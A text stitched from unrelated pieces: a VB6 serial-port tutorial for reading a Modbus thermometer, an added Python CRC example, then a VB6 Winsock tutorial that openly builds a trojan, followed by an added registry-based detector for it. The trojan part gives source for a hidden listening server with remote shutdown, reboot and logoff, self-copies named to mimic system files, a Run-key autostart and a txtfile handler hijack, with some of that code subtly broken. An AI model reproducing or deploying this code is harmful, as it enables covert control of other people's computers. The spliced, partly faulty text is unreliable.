I also developed each of my VB-to-COM communication programs by feeling my way through it myself; the concrete approach is as follows:
I recommend a tool: the COM serial port test tool "ComTone V1.0" (Chinese portable edition).
1. Open the test software for your sound-level meter and set the COM port number, baud rate and so on. I'll use a thermometer as the example.
After starting the query a value comes back; the Receive: field is the returned value 000304012200004b05.
Open the serial port monitor (串口监视精灵) and watch the COM port events of the software:
Here Write is the query command sent by the test software, and read is the data frame returned by the device.
Private Sub Command1_Click() 'Send the query command
If Not MSComm1.PortOpen Then
MSComm1.CommPort = 7 'Serial port is COM7
MSComm1.Settings = "9600,n,8,1"
MSComm1.InBufferCount = 0 'Clear the receive buffer
MSComm1.OutBufferCount = 0 'Clear the transmit buffer
MSComm1.InputMode = comInputModeBinary 'Receive in binary mode
MSComm1.InputLen = 0 'Read all characters in the receive buffer
MSComm1.PortOpen = True 'Open the serial port
MSComm1.RTSEnable = False 'Set to transmit state
End If
Dim pu() As Byte
ReDim pu(7) 'This array is the 8-byte query command
pu(0) = &H00 'Thermometer address
pu(1) = &H03 'Query (read) command
pu(2) = &H00 'Bytes 2 and 3: thermometer address
pu(3) = &H00 'Bytes 2 and 3: thermometer address
pu(4) = &H00 'Bytes 4 and 5: number of registers to read
pu(5) = &H02 'Bytes 4 and 5: number of registers to read
pu(6) = &HC5 'Bytes 6 and 7: CRC check code; since we don't know the device's CRC rule we use the check code produced by the test software
pu(7) = &HDA 'Bytes 6 and 7: CRC check code
MSComm1.Output = pu
'Do nothing; just let other applications process their events.
DoEvents
MSComm1.InBufferCount = 0 'Clear the receive buffer
MSComm1.RThreshold = 9 'Length of data to receive; the COM monitor showed the reply is 9 bytes in total
MSComm1.RTSEnable = True 'Switch to receive state
End Sub
Private Sub Command2_Click()
Timer1.Enabled = False
End Sub
Private Sub Form_Unload(Cancel As Integer)
If MSComm1.PortOpen Then
MSComm1.PortOpen = False 'Close the serial port
End If
Timer1.Enabled = False
End Sub
Private Sub MSComm1_OnComm() 'COM event
Dim PA() As Byte
Dim strdata As String
Dim wd As String
Dim i As Integer
Select Case MSComm1.CommEvent
Case comEvReceive
MSComm1.InputLen = 0 'Read all bytes in the receive buffer
PA = MSComm1.Input 'In binary mode Input returns a Byte array; assign it directly rather than via a String, which would re-encode the bytes
For i = 0 To UBound(PA)
'Print "PA(" & i & ")" & PA(i)
If Len(Hex(PA(i))) = 1 Then 'Pad each byte to two hex digits
strdata = strdata & "0" & Hex(PA(i))
Else
strdata = strdata & Hex(PA(i))
End If
Next
'Returned data string: 000304012600000AC4; we split these 9 bytes according to the communication protocol
'00 is the device number returned per the protocol, 03 the read command, 04 the length of the returned data, and 0126 is the temperature data I want, expressed in hex; below I process the data
wd = CLng("&H" & Left(Right(strdata, 12), 4)) / 10 & "℃" 'Convert to temperature per the communication protocol
Text1 = Text1 & vbCrLf & strdata & " " & wd
strdata = ""
MSComm1.PortOpen = False 'Close the serial port
End Select
End Sub
Private Sub Timer1_Timer()
Call Command1_Click
End Sub
This is my test result.
Below is the communication protocol.
This is the result of monitoring my software with the monitor tool.
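As an added example that is not code from the reply above: the CRC bytes the author copied from the test tool (C5 DA) are exactly what the standard Modbus RTU CRC-16 gives for the query 00 03 00 00 00 02, so the check can be computed instead of hard-coded. This Python script builds the query, verifies the CRC of the reply frames quoted above and rejects bad frames before decoding the temperature; the function names are my own.

```python
# Added example (not from the original post): the CRC the author took from
# the test tool is the standard Modbus RTU CRC-16 (polynomial 0xA001,
# initial value 0xFFFF, low byte on the wire first). It reproduces C5 DA
# for the query above and validates/decodes the 9-byte reply.

def modbus_crc16(data: bytes) -> bytes:
    """CRC-16/MODBUS over data, returned as the two bytes appended to a frame."""
    crc = 0xFFFF
    for b in data:
        crc ^= b
        for _ in range(8):
            crc = (crc >> 1) ^ 0xA001 if crc & 1 else crc >> 1
    return bytes([crc & 0xFF, crc >> 8])  # low byte first on the wire


def build_read_query(slave: int, start_reg: int, count: int) -> bytes:
    """Function 03 (read holding registers) request with the CRC appended."""
    body = bytes([slave, 0x03]) + start_reg.to_bytes(2, "big") + count.to_bytes(2, "big")
    return body + modbus_crc16(body)


def parse_temperature_reply(frame: bytes, slave: int = 0x00) -> float:
    """Validate a function-03 reply and decode the first register as tenths of a degree.

    Rejects short frames, CRC mismatches, replies from another slave,
    exception responses and length mismatches, so a corrupted or spoofed
    frame is never displayed as a reading.
    """
    if len(frame) < 5:
        raise ValueError("frame too short")
    body, crc = frame[:-2], frame[-2:]
    if modbus_crc16(body) != crc:
        raise ValueError("CRC mismatch")
    if body[0] != slave:
        raise ValueError("reply from unexpected slave 0x%02X" % body[0])
    if body[1] & 0x80:
        raise ValueError("exception response, code %d" % body[2])
    if body[1] != 0x03 or len(body) != 3 + body[2]:
        raise ValueError("malformed function-03 reply")
    raw = int.from_bytes(body[3:5], "big")  # first register, e.g. 0x0126
    return raw / 10


if __name__ == "__main__":
    print(build_read_query(0x00, 0x0000, 2).hex())  # 000300000002c5da
    reply = bytes.fromhex("000304012600000ac4")  # reply frame quoted in the post
    print(parse_temperature_reply(reply), "degrees C")
```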
First, create a new project named Server, add a form with Name frmServer, and put a Winsock control on the form with Name sckServer and the protocol left at the default TCP/IP.
Next, go back to the frmServer form module and add the following code:
Private Sub form_Load()
 With Me
 .sckServer.LocalPort = 4000 'Local port
 .sckServer.Listen 'Start listening
 End With
End Sub
'Accept the client's connection request.
Private Sub sckServer_ConnectionRequest(ByVal requestID As Long)
 With Me
 If .sckServer.State <> sckClosed Then .sckServer.Close
 .sckServer.Accept (requestID)
 End With
End Sub
Now let's build the client program: create a new project named Client, name the form frmClient, put a Winsock control on it named sckClient with protocol TCP/IP, then add a button cmdConnect and put this code in the form module:
Private Sub form_Load()
 With Me
 .sckClient.RemoteHost = "127.0.0.1" 'Set the remote IP; in this example it is the local machine.
 .sckClient.RemotePort = 4000 'Remote port, the same as the one set in Server.
 End With
End Sub
Private Sub cmdConnect_Click()
SckClient.Connect
End Sub
At this point, clicking the Connect button lets the two projects communicate, but you can't see it; you can add debug.print "Connetion successful!" to the sckClient_Connect event in Client to check.
This is only the first step and does nothing useful yet; now let's add functionality to them. To keep it simple we'll implement a few small functions: shutdown, reboot and logoff. OK, let's start!
In the Server project add a new module named modApi; this module holds some API functions. Add the following API declarations:
 Public Declare Function ExitWindowsEx Lib "user32" Alias "ExitWindowsEx" (ByVal uFlags As Long, ByVal dwReserved As Long) As Long
Public Const EWX_LOGOFF = 0
Public Const EWX_REBOOT = 2
Public Const EWX_SHUTDOWN = 1
Public Declare Function ClipCursor Lib "user32" Alias "ClipCursor" (lpRect As Any) As Long
Public Type RECT
 Left As Long
 Top As Long
 Right As Long
 Bottom As Long
End Type
Note: when programming the two sockets, the key event for communication is the DataArrival event, which receives remote data.
Next, place three buttons on the frmClient form in the Client project: cmdExit, cmdLogoff and cmdReboot. They are used for the remote shutdown, logoff and reboot operations. Add the following code for each:
Private Sub cmdExit_Click()
 Me.sckClient.SendData "Exit"
End Sub

Private Sub cmdLogoff_Click()
 Me.sckClient.SendData "Logoff"
End Sub

Private Sub cmdReboot_Click()
 Me.sckClient.SendData "Reboot"
End Sub
All of these send a request to the server. Now switch to the Server project: add the sckServer DataArrival event in frmServer to receive the client's requests.
Private Sub sckServer_DataArrival(ByVal bytesTotal As Long)
 Dim strData As String
 With Me
 '' Receive the client's request
 .sckServer.GetData strData
 Select Case strData
 Case "Exit"
 ''Shutdown
 Call ExitWindowsEx(EWX_SHUTDOWN, 0)
 Case "Reboot"
 ''Reboot
 Call ExitWindowsEx(EWX_REBOOT, 0)
 Case "Logoff"
 ''Logoff
 Call ExitWindowsEx(EWX_LOGOFF, 0)
 End Select
 End With
End Sub
OK, at this point we have the functionality, but it's still not enough: we want it to run in the background. That's simple: add one line, me.hide, to the form_Load event in frmServer. Now it can't be seen. But everyone knows a trojan runs automatically as soon as the machine boots; why is that, and how is it done? Add it to the startup group in the registry? Right, follow me!
Go back to modApi in the Server project and add the following API functions:
Public Declare Function RegOpenKey Lib "advapi32.dll" Alias "RegOpenKeyA" (ByVal hKey As Long, ByVal lpSubKey As String, phkResult As Long) As Long
Public Declare Function RegSetvalueEx Lib "advapi32.dll" Alias "RegSetvalueExA" (ByVal hKey As Long, ByVal lpvalueName As String, ByVal Reserved As Long, ByVal dwType As Long, lpData As Any, ByVal cbData As Long) As Long
Public Declare Function RegCreateKey Lib "advapi32.dll" Alias "RegCreateKeyA" (ByVal hKey As Long, ByVal lpSubKey As String, phkResult As Long) As Long
Public Const REG_BINARY = 3
Public Const REG_SZ = 1
Public Const HKEY_LOCAL_MACHINE = &H80000002
Public Const HKEY_CLASSES_ROOT = &H80000000
The procedure that writes to the registry startup group:
Public Sub StartupGroup()
 Dim sKey As String
 Dim result As Long
 Dim hKeyID As Long
 Dim sKeyVal As String

 sKey = "Systrsy" ''Key in the startup group; pick a name close to a system file.
 sKeyVal = "C:\windows\system\systrsy.exe" ''Path of the trojan file; GetSystemDirectory can be used to obtain the system path.
 result = RegOpenKey(HKEY_LOCAL_MACHINE, _
 "Software\Microsoft\Windows\CurrentVersion\Run", hKeyID)
 If result = 0 Then
 result = RegSetvalueEx(hKeyID, sKey, 0&, REG_SZ, sKeyVal, _
 Len(sKey) + 1)
 End If
End Sub
OK, done, just that simply. But have you thought about it: if the user isn't a complete newbie and simply deletes it in the registry, isn't all our hard work wasted? That won't do; we have to make it so that even if they find it they can't delete it. Look at the following code:
Public Sub WriteToTxt()
 Dim result As Long
 Dim hKeyID As Long
 Dim skey As String
 Dim skeyVal As String
 skey = "txtfile\shell\open\command"
 skeyVal = "C:\windows\system\txtView.exe"
 result = RegOpenKey(HKEY_CLASSES_ROOT, skeyVal, hKeyID)
 If result = 0 Then
 result = RegSetvalueEx(hKeyID, skey, 0&, REG_SZ, _
 skeyVal, Len(skeyVal) + 1)
 End If
End Sub
Plenty of readers will see it at a glance: it associates with txt files, exactly right. But where does C:\windows\system\txtView.exe come from? Our trojan is C:\windows\system\systrsy.exe. This is our trojan's double.
OK, go back to form_Load of the frmServer form in the Server project and add the following code:
Dim sCurrentPath As String, sSystemDir As String
 sCurrentPath = App.Path & "\" & App.EXEName & ".exe"
 sSystemDir = "C:\windows\system"
 On Error Resume Next
'Copy the file to the system directory as Systrsy.exe
 FileCopy sCurrentPath, sSystemDir & "\Systrsy.exe"
 On Error Resume Next
'Copy the file to the system directory as txtView.exe
 FileCopy sCurrentPath, sSystemDir & "\txtView.exe"

'Call them
Call startupGroup
Call WriteToTxt

''Check whether the program is already running
 If App.PrevInstance Then
 'If it is already running, exit.
 End
 End If
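Added here from the defender's side, not part of the tutorial above: the two persistence tricks it describes (a value under the HKLM Run key and a hijacked txtfile open command) are both visible in a registry export of those keys. The script below is my own; it parses a constructed .reg sample and flags Run entries whose executable sits outside standard directories, and a txtfile handler that is not notepad.exe (the Windows default). The function names and the STANDARD_DIRS allowlist are assumptions.

```python
import re

# Constructed .reg export standing in for a real `reg export` of the two
# keys the tutorial touches (backslashes are doubled, as in .reg files).
SAMPLE_REG = r'''Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run]
"SecurityHealth"="C:\\Windows\\system32\\SecurityHealthSystray.exe"
"Systrsy"="C:\\windows\\system\\systrsy.exe"

[HKEY_CLASSES_ROOT\txtfile\shell\open\command]
@="C:\\windows\\system\\txtView.exe"
'''

RUN_KEY = r"hkey_local_machine\software\microsoft\windows\currentversion\run"
TXT_CMD_KEY = r"hkey_classes_root\txtfile\shell\open\command"
# Assumed allowlist of directories where an autostart binary is expected.
STANDARD_DIRS = re.compile(r"^[a-z]:\\(windows\\system32|program files)\\")


def parse_reg_export(text):
    """Return {key (lowercased): {value_name: data}}; '@' is the default value."""
    keys, current = {}, None
    for line in text.splitlines():
        line = line.strip()
        if line.startswith("[") and line.endswith("]"):
            current = line[1:-1].lower()
            keys[current] = {}
        elif current and "=" in line:
            name, _, data = line.partition("=")
            name = name.strip('"')
            if data.startswith('"') and data.endswith('"'):
                data = data[1:-1].replace("\\\\", "\\")  # undo .reg escaping
            keys[current][name] = data
    return keys


def check_persistence(text, expected_txt_handler="notepad.exe"):
    """Flag Run values outside standard dirs and a non-default txtfile handler."""
    findings, keys = [], parse_reg_export(text)
    for name, path in keys.get(RUN_KEY, {}).items():
        if not STANDARD_DIRS.match(path.lower()):
            findings.append(("run_entry_outside_standard_dirs", name, path))
    cmd = keys.get(TXT_CMD_KEY, {}).get("@", "")
    if cmd and expected_txt_handler not in cmd.lower():
        findings.append(("txtfile_handler_hijacked", "@", cmd))
    return findings


if __name__ == "__main__":
    for finding in check_persistence(SAMPLE_REG):
        print(*finding)
```

On a live machine the same check runs over the output of `reg export` for those two keys; a Run entry named after a system component but living in an unusual directory is the pattern to review.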